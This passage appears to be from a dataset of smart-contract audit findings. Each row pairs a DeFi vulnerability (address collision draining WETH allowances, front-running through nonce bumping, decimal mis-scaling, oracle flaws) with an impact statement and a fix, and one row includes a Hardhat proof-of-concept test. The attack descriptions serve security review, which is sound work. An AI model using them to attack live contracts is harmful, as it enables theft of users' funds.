⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// 
⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc , @0xKurt , @codenamejason , @0xZakk , @nfrgosselin \\n/// @notice Anchors are associated with profiles and are accessible exclusively by the profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// 
@notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\n" +UUPSUpgradeable vulnerability in OpenZeppelin Contracts,medium,"Openzeppelin has found the critical severity bug in UUPSUpgradeable. The kyber-swap contracts have used both openzeppelin contracts as well as openzeppelin upgradeable contracts with version v4.3.1. 
This is confirmed from package.json.\\n```\\nFile: ks-elastic-sc/package.json\\n\\n ""@openzeppelin/contracts"": ""4.3.1"",\\n ""@openzeppelin/test-helpers"": ""0.5.6"",\\n ""@openzeppelin/contracts-upgradeable"": ""4.3.1"",\\n```\\n\\nThe `UUPSUpgradeable` vulnerability has been found in openzeppelin versions as follows:\\n@openzeppelin/contracts : Affected versions >= 4.1.0 < 4.3.2 @openzeppelin/contracts-upgradeable : >= 4.1.0 < 4.3.2\\nHowever, openzeppelin has fixed this issue in version 4.3.2\\nOpenzeppelin bug acceptance and fix: check here\\nThe following contracts have been affected due to this vulnerability\\nPoolOracle.sol\\nTokenPositionDescriptor.sol\\nBoth of these contracts are UUPSUpgradeable and the issue must be fixed.",Update the openzeppelin library to the latest version.\\nCheck this openzeppelin security advisory to initialize the UUPS implementation contracts.\\nCheck this openzeppelin UUPS documentation.,Upgradeable contracts using UUPSUpgradeable may be vulnerable to an attack affecting uninitialized implementation contracts.,"```\\nFile: ks-elastic-sc/package.json\\n\\n ""@openzeppelin/contracts"": ""4.3.1"",\\n ""@openzeppelin/test-helpers"": ""0.5.6"",\\n ""@openzeppelin/contracts-upgradeable"": ""4.3.1"",\\n```\\n" +Router.sol is vulnerable to address collision,medium,"The pool address check in the callback function isn't strict enough and can suffer issues with collision. Due to the truncated nature of the create2 opcode the collision resistance is already impaired to 2^160 as that is the total number of possible hashes after truncation. Obviously if you are searching for a single hash, this is (basically) impossible. The issue here is that one does not need to search for a single address as the router never verifies that the pool actually exists. 
This is the crux of the problem, but first let's do a little math as to why this is a problem.\\n$$ 1 - e ^ {-k(k-1) \\over 2N } $$\\nWhere k is the number of hash values and N is the number of possible hashes\\nFor very large numbers we can further approximate the exponent to:\\n$$ -k^2 \\over 2N $$\\nThis exponent is now trivial to solve for an approximate attack value which is:\\n$$ k = \\sqrt{2N} $$\\nIn our scenario N is 2^160 (our truncated keccak256) which means that our approximate attack value is 2^80 since we need to generate two sets of hashes. The first set is to generate 2^80 public addresses and the second is to generate pool address from variations in the pool specifics(token0, token1, fee). Here we reach a final attack value of 2^81 hashes. Using the provided calculator we see that 2^81 hashes has an approximate 86.4% chance of a collision. Increase that number to 2^82 and the odds of collision becomes 99.96%. In this case, a collision between addresses means breaking this check and draining the allowances of all users to a specific token. This is because the EOA address will collide with the supposed pool address allowing it to bypass the msg.sender check. Now we considered the specific of the contract.\\nRouter.sol#L47-L51\\n```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n\\nThe above snippet from the swapCallback function is used to verify that msg.sender is the address of the pool.\\nRouter.sol#L224-L231\\n```\\nfunction _getPool(\\n address tokenA,\\n address tokenB,\\n uint24 fee\\n) private view returns (IPool) {\\n return IPool(PoolAddress.computeAddress(factory, tokenA, tokenB, fee, poolInitHash));\\n}\\n```\\n\\nWe see that these lines never check with the factory that the pool exists or any of the inputs are valid in any way. token0 can be constant and we can achieve the variation in the hash by changing token1. 
The attacker could use token0 = WETH and vary token1. This would allow them to steal all allowances of WETH. Since allowances are forever until revoked, this could put hundreds of millions of dollars at risk.\\nAlthough this would require a large amount of compute it is already possible to break with current computing. Given the enormity of the value potentially at stake it would be a lucrative attack to anyone who could fund it. In less than a decade this would likely be a fairly easily attained amount of compute, nearly guaranteeing this attack.",Verify with the factory that msg.sender is a valid pool,Address collision can cause all allowances to be drained,"```\\nrequire(\\n msg.sender == address(_getPool(tokenIn, tokenOut, fee)),\\n 'Router: invalid callback sender'\\n);\\n```\\n" +Position value can fall below minimum acceptable quote value when partially closing positions requested to be closed in full,medium,"In `LibQuote.closeQuote` there is a requirement to have the remaining quote value to not be less than minAcceptableQuoteValue:\\n```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low"");\\n}\\n```\\n\\nNotice the condition when this require happens:\\n`LibQuote.quoteOpenAmount(quote)` is remaining open amount\\n`quote.quantityToClose` is requested amount to close\\nThis means that this check is ignored if partyA has requested to close amount equal to full remaining quote value, but enforced when it's not (even if closing fully). For example, a quote with opened amount = 100 is requested to be closed in full (amount = 100): this check is ignored. 
But PartyB can fill the request partially, for example fill 99 out of 100, and the remainder (1) is not checked to confirm to `minAcceptableQuoteValue`.\\nThe following execution paths are possible if PartyA has open position size = 100 and `minAcceptableQuoteValue` = 5:\\n`requestToClosePosition(99)` -> revert\\n`requestToClosePosition(100)` -> `fillCloseRequest(99)` -> pass (remaining quote = 1)","The condition should be to ignore the `minAcceptableQuoteValue` if request is filled in full (filledAmount == quantityToClose):\\n```\\n- if (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n+ if (filledAmount != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low"");\\n }\\n```\\n","There can be multiple reasons why the protocol enforces `minAcceptableQuoteValue`, one of them might be the efficiency of the liquidation mechanism: when quote value is too small (and liquidation value too small too), liquidators will not have enough incentive to liquidate these positions in case they become insolvent. 
Both partyA and partyB might also not have enough incentive to close or respond to request to close such small positions, possibly resulting in a loss of funds and greater market risk for either user.\\nProof of Concept\\nAdd this to any test, for example to `ClosePosition.behavior.ts`.\\n```\\nit(""Close position with remainder below minAcceptableQuoteValue"", async function () {\\n const context: RunContext = this.context;\\n\\n this.user_allocated = decimal(1000);\\n this.hedger_allocated = decimal(1000);\\n\\n this.user = new User(this.context, this.context.signers.user);\\n await this.user.setup();\\n await this.user.setBalances(this.user_allocated, this.user_allocated, this.user_allocated);\\n\\n this.hedger = new Hedger(this.context, this.context.signers.hedger);\\n await this.hedger.setup();\\n await this.hedger.setBalances(this.hedger_allocated, this.hedger_allocated);\\n\\n await this.user.sendQuote(limitQuoteRequestBuilder()\\n .quantity(decimal(100))\\n .price(decimal(1))\\n .cva(decimal(10)).lf(decimal(5)).mm(decimal(15))\\n .build()\\n );\\n await this.hedger.lockQuote(1, 0, decimal(5, 17));\\n await this.hedger.openPosition(1, limitOpenRequestBuilder().filledAmount(decimal(100)).openPrice(decimal(1)).price(decimal(1)).build());\\n\\n // now try to close full position (100)\\n await this.user.requestToClosePosition(\\n 1,\\n limitCloseRequestBuilder().quantityToClose(decimal(100)).closePrice(decimal(1)).build(),\\n );\\n\\n // now partyA cancels request\\n //await this.user.requestToCancelCloseRequest(1);\\n\\n // partyB can fill 99\\n await this.hedger.fillCloseRequest(\\n 1,\\n limitFillCloseRequestBuilder()\\n .filledAmount(decimal(99))\\n .closedPrice(decimal(1))\\n .build(),\\n );\\n\\n var q = await context.viewFacet.getQuote(1);\\n console.log(""quote quantity: "" + q.quantity.div(decimal(1)) + "" closed: "" + q.closedAmount.div(decimal(1)));\\n\\n});\\n```\\n\\nConsole execution result:\\n```\\nquote quantity: 100 closed: 
99\\n```\\n","```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low"");\\n}\\n```\\n" +"MultiAccount `depositAndAllocateForAccount` function doesn't scale the allocated amount correctly, failing to allocate enough funds",medium,"Internal accounting (allocatedBalances) are tracked as fixed numbers with 18 decimals, while collateral tokens can have different amount of decimals. This is correctly accounted for in AccountFacet.depositAndAllocate:\\n```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n\\nBut it is treated incorrectly in MultiAccount.depositAndAllocateForAccount:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n bytes memory _callData = abi.encodeWithSignature(\\n ""allocate(uint256)"",\\n amount\\n );\\n innerCall(account, _callData);\\n```\\n\\nThis leads to incorrect allocated amounts.","Scale amount correctly before allocating it:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n+ uint256 amountWith18Decimals = (amount * 1e18) /\\n+ (10 ** IERC20Metadata(collateral).decimals());\\n bytes memory _callData = abi.encodeWithSignature(\\n ""allocate(uint256)"",\\n- amount\\n+ amountWith18Decimals\\n );\\n innerCall(account, _callData);\\n```\\n","Similar to 222 from previous audit contest, the user expects to have full amount deposited and allocated, but ends up with only dust amount allocated, which can lead to unexpected liquidations (for example, user is at the edge of liquidation, calls depositAndAllocate to improve account health, but is liquidated instead). 
For consistency reasons, since this is almost identical to 222, it should also be high.","```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n" +"PartyBFacetImpl.chargeFundingRate should check whether quoteIds is empty array to prevent partyANonces from being increased, causing some operations of partyA to fail",medium,"```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, ""PartyBFacet: Length not match"");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, ""PartyBFacet: PartyA will be insolvent"");\\n require(partyBAvailableBalance >= 0, ""PartyBFacet: PartyB will be insolvent"");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n\\nAs long as partyBAvailableBalance(L318) and partyAAvailableBalance(L323) are greater than or equal to 0, that is to say, PartyA and PartyB are solvent. 
Then, partyB can add 1 to `partyANonces[partyA]` at little cost which is the gas of tx.\\n```\\nFile: symmio-core\\contracts\\facets\\PartyA\\PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// rest of code// rest of code//assume codes here are executed\\n273:-> LibMuon.verifyPairUpnlAndPrice(upnlSig, quote.partyB, quote.partyA, quote.symbolId);\\n// rest of code// rest of code\\n }\\n```\\n\\nIf the current price goes against partyB, then partyB can front-run `forceClosePosition` and call `chargeFundingRate` to increase the nonces of both parties by 1. In this way, partyA's `forceClosePosition` will inevitably revert because the nonces are incorrect.","```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n317:- require(quoteIds.length == rates.length, ""PartyBFacet: Length not match"");\\n317:+ require(quoteIds.length > 0 && quoteIds.length == rates.length, ""PartyBFacet: Length is 0 or Length not match"");\\n```\\n","Due to this issue, partyB can increase nonces of any partyA with little cost, causing some operations of partyA to fail (refer to the Vulnerability Detail section). 
This opens up the opportunity for partyB to turn the table.","```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, ""PartyBFacet: Length not match"");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, ""PartyBFacet: PartyA will be insolvent"");\\n require(partyBAvailableBalance >= 0, ""PartyBFacet: PartyB will be insolvent"");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n" +Stat calculator returns incorrect report for swETH,high,"The purpose of the in-scope `SwEthEthOracle` contract is to act as a price oracle specifically for swETH (Swell ETH) per the comment in the contract below and the codebase's README\\n```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. 
Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n\\nPer the codebase in the contest repository, the price oracle for the swETH is understood to be configured to the `SwEthEthOracle` contract at Line 252 below.\\n```\\nFile: RootOracleIntegrationTest.t.sol\\n swEthOracle = new SwEthEthOracle(systemRegistry, IswETH(SWETH_MAINNET));\\n..SNIP..\\n // Lst special pricing case setup\\n // priceOracle.registerMapping(SFRXETH_MAINNET, IPriceOracle(address(sfrxEthOracle)));\\n priceOracle.registerMapping(WSTETH_MAINNET, IPriceOracle(address(wstEthOracle)));\\n priceOracle.registerMapping(SWETH_MAINNET, IPriceOracle(address(swEthOracle)));\\n```\\n\\nThus, in the context of this audit, the price oracle for the swETH is mapped to the `SwEthEthOracle` contract.\\nBoth the swETH oracle and calculator use the same built-in `swEth.swETHToETHRate` function to retrieve the price of swETH in ETH.\\nLST Oracle Calculator Rebasing\\nswETH SwEthEthOracle - `swEth.swETHToETHRate()` SwethLSTCalculator - `IswETH(lstTokenAddress).swETHToETHRate()` False\\n```\\nFile: SwEthEthOracle.sol\\n /// @inheritdoc IPriceOracle\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n..SNIP..\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n\\n```\\nFile: SwethLSTCalculator.sol\\n function calculateEthPerToken() public view override returns (uint256) {\\n return IswETH(lstTokenAddress).swETHToETHRate();\\n }\\n```\\n\\nWithin the `LSTCalculatorBase.current` function, assume that the `swEth.swETHToETHRate` function returns $x$ when called. In this case, the `price` at Line 203 below and `backing` in Line 210 below will be set to $x$ since the `getPriceInEth` and `calculateEthPerToken` functions depend on the same `swEth.swETHToETHRate` function internally. 
Thus, `priceToBacking` will always be 1e18:\\n$$ \\begin{align} priceToBacking &= \\frac{price \\times 1e18}{backing} \\ &= \\frac{x \\times 1e18}{x} \\ &= 1e18 \\end{align} $$\\nSince `priceToBacking` is always 1e18, the `premium` will always be zero:\\n$$ \\begin{align} premium &= priceToBacking - 1e18 \\ &= 1e18 - 1e18 \\ &= 0 \\end{align} $$\\nAs a result, the calculator for swETH will always report the wrong statistic report for swETH. If there is a premium or discount, the calculator will wrongly report none.\\n```\\nFile: LSTCalculatorBase.sol\\n function current() external returns (LSTStatsData memory) {\\n..SNIP..\\n IRootPriceOracle pricer = systemRegistry.rootPriceOracle();\\n uint256 price = pricer.getPriceInEth(lstTokenAddress);\\n..SNIP..\\n uint256 backing = calculateEthPerToken();\\n // price is always 1e18 and backing is in eth, which is 1e18\\n priceToBacking = price * 1e18 / backing;\\n }\\n\\n // positive value is a premium; negative value is a discount\\n int256 premium = int256(priceToBacking) - 1e18;\\n\\n return LSTStatsData({\\n lastSnapshotTimestamp: lastSnapshotTimestamp,\\n baseApr: baseApr,\\n premium: premium,\\n slashingCosts: slashingCosts,\\n slashingTimestamps: slashingTimestamps\\n });\\n }\\n```\\n","When handling the swETH within the `LSTCalculatorBase.current` function, consider other methods of obtaining the fair market price of swETH that do not rely on the `swEth.swETHToETHRate` function such as external 3rd-party price oracle.","The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. 
Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides inaccurate information, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.","```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n" +Incorrect approach to tracking the PnL of a DV,high,"Let $DV_A$ be a certain destination vault.\\nAssume that at $T0$, the current debt value (currentDvDebtValue) of $DV_A$ is 95 WETH, and the last debt value (updatedDebtBasis) is 100 WETH. Since the current debt value has become smaller than the last debt value, the vault is making a loss of 5 WETH since the last rebalancing, so $DV_A$ is sitting at a loss, and users can only burn a limited amount of DestinationVault_A's shares.\\nAssume that at $T1$, there is some slight rebalancing performed on $DV_A$, and a few additional LP tokens are deposited to it. Thus, its current debt value increased to 98 WETH. At the same time, the `destInfo.debtBasis` and `destInfo.ownedShares` will be updated to the current value.\\nImmediately after the rebalancing, $DV_A$ will not be considered sitting in a loss since the `currentDvDebtValue` and `updatedDebtBasis` should be equal now. As a result, users could now burn all the $DV_A$ shares of the LMPVault during withdrawal.\\n$DV_A$ suddenly becomes not sitting at a loss even though the fact is that it is still sitting at a loss of 5 WETH. The loss has been written off.\\n```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. 
Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n","Consider a more sophisticated approach to track a DV's Profit and Loss (PnL).\\nIn our example, $DV_A$ should only be considered not making a loss if the price of the LP tokens starts to appreciate and cover the loss of 5 WETH.","A DV might be incorrectly marked as not sitting in a loss, thus allowing users to burn all the DV shares, locking in all the loss of the DV and the vault shareholders.","```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n" +Price returned by Oracle is not verified,medium,"As per the example provided by Tellor on how to integrate the Tellor oracle into the system, it has shown the need to check that the price returned by the oracle is not zero.\\n```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n\\nThus, the value returned from the `getDataBefore` function should be verified to ensure that the price returned by the oracle is not zero. 
However, this was not implemented.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n","Update the affected function as follows.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = 